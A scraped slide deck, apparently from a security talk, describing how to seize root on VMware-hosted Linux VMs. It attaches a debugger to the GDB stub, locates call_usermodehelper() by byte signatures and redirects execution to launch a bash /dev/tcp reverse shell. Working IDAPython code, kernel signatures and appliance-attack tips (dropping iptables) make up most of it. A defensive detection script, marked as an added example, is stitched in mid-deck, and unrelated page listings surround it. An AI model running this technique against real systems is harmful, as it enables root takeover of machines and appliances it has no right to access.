Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
buds n tech IT solutions
buds n  tech IT                solutionsbuds n  tech IT                solutions
buds n tech IT solutions
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 

0x01 - Breaking into Linux VMs for Fun and Profit.pdf

  • 1. Breaking into Linux VMs For Fun and Profit Russell Sanford xort @ sploit.online
  • 2. 0x01 • I Originally created this technique in 2016 and did a talk called… Compromising Linux Virtual Machines with Debugging Mechanisms (slideshare .net) https://www.slideshare.net/xort/compromising-linux-virtual-machines-with-debugging-mechanisms This technique allows you to seize control of a (on-prem) Linux Virtual Machine and spawn a connect back root shell from kernel land. (Ring0 -> Ring3 -> Us) Machines relying on LUKs boot-key encryption are not secure and access to their appliances code base can be audited for vulnerabilities. Breaking Into Linux VMs for Fun and Profit
  • 3. 0x02 This attack opened the door to finding >30 Remote Root (auth and pre- auth) vulnerabilities in security vendor’s products (Citrix, Sophos, Barracuda, Bluecoat, Sonicwall, etc…) Made me > $20k in bug bounties ( the ‘profit’ :D ) Got me up to #107 on bugcrowd’s ~50k signed up researchers Breaking Into Linux VMs for Fun and Profit
  • 4. 0x03 Vmware added GDB Plugs to their products allowing for OS developers to diagnose code in their Virtual Machines. I adapted methodology used in UNIX Ptrace styled attacks to see what fun could be had… Breaking Into Linux VMs for Fun and Profit So What Brought this on…
  • 5. 0x04 Breaking Into Linux VMs for Fun and Profit int call_usermodehelper ( const char * path, char ** argv, char ** envp, int wait); Name call_usermodehelper — prepare and start a usermode application Synopsis (FROM KERNEL LAND) Were starting off in Kernel Land… This allows us to go from RING 0 (kernel) to RING3 (userland) Where we can launch our attack. :D
  • 6. 0x05 Breaking Into Linux VMs for Fun and Profit Finding Bytes Signatures… To find Pathways to API Locate SIMILAR sections of code from multiple target’s using unique assembly sequences Compare bytes and find sections with gaps of indifference that realign later in the code for more unique samples
  • 7. 0x06 Breaking Into Linux VMs for Fun and Profit Configuring IDA PRO And VMware to have some fun…
  • 8. 0x07 • VMware Workstation >= 5.0 • VMware Player >= 3.0 • Fusion • Allow RWX of memory, ability to single-step, etc @ kernel level • When attaching to a Linux VM we land in native_safe_halt() Breaking Into Linux VMs for Fun and Profit VMWARE GDB STUBS
  • 9. 0x08 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 10. 0x09 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 11. 0x0A Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
  • 12. 0x0B ORIGINAL ATTACK (2016) Breaking Into Linux VMs for Fun and Profit
  • 13. 0x0C Breaking Into Linux VMs for Fun and Profit ORIGINAL ATTACK (2016)
  • 14. 0x0D Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Identification… THE PROBLEM: The Old Way was slow and would sometimes fail with debugging over a network… I needed to come up with a solution to find call_usermodehelper() API in a quicker and more elegant way. THE SOLUTION: Instead of one large sweep of memory looking for a single byte signature… I would analyze the kernel and write a routine to find functions that called into functions, that would call into functions, that would call into functions (3 layers deep) and end up at an address CLOSE ( 0xFFFFFFFFF0000 range) to call_usermodehelper() From Here, a final memory fingerprint byte scan is done to identify call_usermodehelper()
  • 15. 0x0E Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Pathway Identification Map Routine (Searches 4 Levels Deep in Code XREFs) for an address close to call_usermodehelper()
  • 16. 0x0F Breaking Into Linux VMs for Fun and Profit
  • 17. 0x10 • THE REVISED ATTACK (2023) Shellcode? Who needs Shellcode… :D …..Not Us. • We change RIP to call_usermodehelper()’s entry point and set register values to the ARGV[] data we store backwards in the stack • When it reaches the end of the function – it returns to where native_safe_halt() would have returned and it’s as if we never made a change • Return of execution is smoothly given back to the OS – but our shell has been spawned. :D Breaking Into Linux VMs for Fun and Profit
  • 18. 0x11 • THE REVISED ATTACK (2023) Breaking Into Linux VMs for Fun and Profit We change RIP from native_safe_halt() to call_usermodehelper() without any patches to the code. call_usermodehelper() will cleanly exit once our shell is spawned, returning to where native_safe_halt() was supposed to return
  • 19. 0x12 Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023)
    1) API Identification through:
       A) 1st Round - Memory Signature scan to find Code Xref’ed to…
       B) Extracting Pointer from CALL instruction (and calculating the two’s complement offset)
       C) 2nd Round – Memory Signature scan to find Code Xref’ed to…
       D) Extracting Pointer from CALL instruction (and calculating the two’s complement offset)
       E) 3rd Round – Memory Scanning for call_usermodehelper()’s API address
    2) Backing up Machine State - Register Values and Memory Area to be used for executing Shellcode (current RIP address)
    3) Creating ARGV[] data somewhere back in the Stack
    4) Restoring Machine State – Restoring Register Values – Setting RIP back – Patching back memory we overwrote to execute Shellcode
  • 20. 0x13 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() …
  • 21. 0x14 Breaking Into Linux VMs for Fun and Profit We start in native_safe_halt() … Scan up in memory for acpi_os_unmap_iomem() using byte signature pattern: 48 B9 22 01 00 00 00 00 AD DE ... acpi_os_unmap_iomem_sig = "48 B9 22 01 00 00 00 00 AD DE" sig_addr = idc.find_binary(addr, SEARCH_UP, acpi_os_unmap_iomem_sig)
  • 22. 0x15 Breaking Into Linux VMs for Fun and Profit In acpi_os_unmap_iomem() we find a CALL to queue_rcu_work(); we extract the destination API from that CALL instruction, which is located 0x2d bytes from our byte signature offset_to_queue_rcu_work = ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x2d),4,0))[0]).value
  • 23. 0x16 Breaking Into Linux VMs for Fun and Profit queue_rcu_work() resides close to call_usermodehelper() in memory … call_usermodehelper_sig = "55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD" sig_addr = idc.find_binary(queue_rcu_work_address, SEARCH_UP, call_usermodehelper_sig) We search up for the binary pattern: 55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD to find it.
  • 24. 0x17 Breaking Into Linux VMs for Fun and Profit ARGV in Memory… • Top area is set aside to hold QWORD of pointers to strings used in ARGV array • Ends with NULL (Qword) to signify end of array • Bottom area will hold actual string data
  • 25. 0x18 Breaking Into Linux VMs for Fun and Profit
    con_back_ip = "192.168.1.111"
    con_back_port = "33333"
    command_to_execute = "bash -i >& /dev/tcp/" + con_back_ip + "/" + con_back_port + " 0>&1"
    # CMD in memory for ARGV...
    cmd_runner_prefix = b"/bin/bash\x00-c\x00"
    # payload / command to execute
    location = get_reg_value("rsp") - 0x1000
    location2 = get_reg_value("rsp") - 0x1100
    idaapi.dbg_write_memory(location, (cmd_runner_prefix + command_to_execute.encode('latin-1')) + b"\x00")
    set_reg_value(location, "rdi")   # RDI = program to execute
    # RSI = construct argv[]
    idaapi.dbg_write_memory(location2, pack("<Q", location))        # program name and start of argv
    idaapi.dbg_write_memory(location2+8, pack("<Q", location+10))   # "-c" (follows "/bin/bash\x00")
    idaapi.dbg_write_memory(location2+16, pack("<Q", location+13))  # command string (follows "-c\x00")
    idaapi.dbg_write_memory(location2+24, pack("<Q", 0x0))          # end of argv[]
    set_reg_value(location2, "rsi")  # RSI = argv[]
    set_reg_value(0x0, "rdx")        # RDX = envp[] (null)
    set_reg_value( call_usermodehelper , "rip")  # RIP to call_usermodehelper()
  • 26. 0x19 Breaking Into Linux VMs for Fun and Profit Exploit in action… Root Shell 
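The shell the previous slides spawn has two properties a defender can key on: its command line is a bash /dev/tcp reverse-shell one-liner, and it is started by the kernel's usermode-helper machinery rather than by a login session, so its parent is a kernel thread instead of sshd, a terminal or an init service. The following is an added example, not code from the talk: it runs both checks over a constructed `ps -eo pid,ppid,comm,args` listing. The parent-is-kernel-thread rule assumes usermode helpers show up with kthreadd (PID 2) or a kworker as parent; the PIDs and process names in the sample are constructed, and the command line mirrors the one from the slide above.

```python
# Constructed ps output (pid, ppid, comm, args) showing one normal SSH login
# shell and one shell spawned through the kernel usermode helper.
SAMPLE_PS = """\
    PID    PPID COMMAND         COMMAND
      1       0 systemd         /sbin/init
      2       0 kthreadd        [kthreadd]
    611       2 kworker/u4:1    [kworker/u4:1-events_unbound]
   1042       1 sshd            sshd: /usr/sbin/sshd -D [listener]
   1330    1042 bash            -bash
   2217       2 bash            /bin/bash -c bash -i >& /dev/tcp/192.168.1.111/33333 0>&1
   2218    2217 bash            bash -i
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}
KTHREADD_PID = 2  # assumption: usermode helpers are parented to kthreadd or a kworker


def parse_ps(ps_output):
    """Map pid -> (ppid, comm, args) from 'ps -eo pid,ppid,comm,args' text."""
    procs = {}
    for line in ps_output.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header or blank line
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3] if len(parts) > 3 else ""
        procs[pid] = (ppid, comm, args)
    return procs


def find_suspicious_shells(ps_output):
    """Return [(pid, [reasons])] for shells that look kernel-spawned or network-bound."""
    procs = parse_ps(ps_output)
    findings = []
    for pid in sorted(procs):
        ppid, comm, args = procs[pid]
        reasons = []
        # Rule 1: bash's built-in network redirection in the command line.
        if "/dev/tcp/" in args or "/dev/udp/" in args:
            reasons.append("bash network redirection in command line")
        # Rule 2: a shell whose parent is a kernel thread, i.e. it was not
        # started by any userland parent (login, cron, init service).
        if comm in SHELLS:
            parent = procs.get(ppid)
            parent_comm = parent[1] if parent else ""
            if ppid == KTHREADD_PID or parent_comm == "kthreadd" or parent_comm.startswith("kworker"):
                reasons.append("shell parented to kernel thread %d (%s)" % (ppid, parent_comm or "?"))
        if reasons:
            findings.append((pid, reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in find_suspicious_shells(SAMPLE_PS):
        print(pid, "; ".join(reasons))
```

Rule 2 on its own will also fire on legitimate helpers the kernel launches (module loading, hotplug scripts), which is why it is restricted to shell binaries; an EDR or auditd rule expressing the same parent/child relationship (exe is a shell, parent is kthreadd or a kworker) gives the same signal without polling ps.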
  • 27. 0x17 Breaking Into Linux VMs for Fun and Profit The do_coredump() method Universal Unlock Method for ALL 5x 6x Kernels ( also… much slower :D ! Go grab food and wait! )
  • 28. 0x1A Breaking Into Linux VMs for Fun and Profit When we attach to a running Linux kernel using GDB stubs, we land in a call to native_safe_halt(). This is where our journey begins… :D
  • 29. 0x1B Breaking Into Linux VMs for Fun and Profit do_coredump_sig1 = "BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0" sig_addr = idc.find_binary(addr, SEARCH_UP, do_coredump_sig1) We search up for the binary pattern: BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0 to land in do_coredump()
  • 30. 0x1C Breaking Into Linux VMs for Fun and Profit do_coredump_sig2 = "50 49 8B" sig_addr = idc.find_binary(sig_addr, SEARCH_UP, do_coredump_sig2) We search up for the binary pattern: 50 49 8B to land near the call to call_usermodehelper_setup()…
  • 31. 0x1D Breaking Into Linux VMs for Fun and Profit do_coredump_sig3 = "E8 ?? ?? ?? ?? 44 8b" sig_addr = idc.find_binary(sig_addr, SEARCH_DOWN, do_coredump_sig3) call_usermodehelper_setup = (sig_addr+1) + ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x1),4,0))[0]).value We search down for the binary pattern: E8 ?? ?? ?? ?? 44 8b to find the actual address reference
  • 32. 0x1E Breaking Into Linux VMs for Fun and Profit We dereference the address of call_usermodehelper_setup() knowing call_usermodehelper() is nearby, just bytes below in a following function declaration…. VERY CLOSE NOW! :D
  • 33. 0x1F Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig1 = "81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00" sig_addr = idc.find_binary(call_usermodehelper_setup, SEARCH_DOWN, call_usermodehelper_sig1) We search down for the binary pattern: 81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00 to land in call_usermodehelper() …
  • 34. 0x20 Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig2 = "E8 ?? ?? ?? ?? 55 83 F9 01" call_usermodehelper = idc.find_binary(sig_addr, SEARCH_UP, call_usermodehelper_sig2) Lastly, we search up to find the beginning bytes of the function: call_usermodehelper() … GAME TIME! :D
  • 35. 0x21 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() using the do_coredump() route/method…
  • 36. 0x22 Breaking Into Linux VMs for Fun and Profit Root Shell 
  • 37. 0x23 Breaking Into Linux VMs for Fun and Profit Tips for compromising Network Appliances: • Prelude payload with call to Drop IPTABLES • Try adding a serial connection and using a serial connect back 1-liner
  • 38. 0x24 Breaking Into Linux VMs for Fun and Profit Thanks! Russell Sanford xort@sploit.online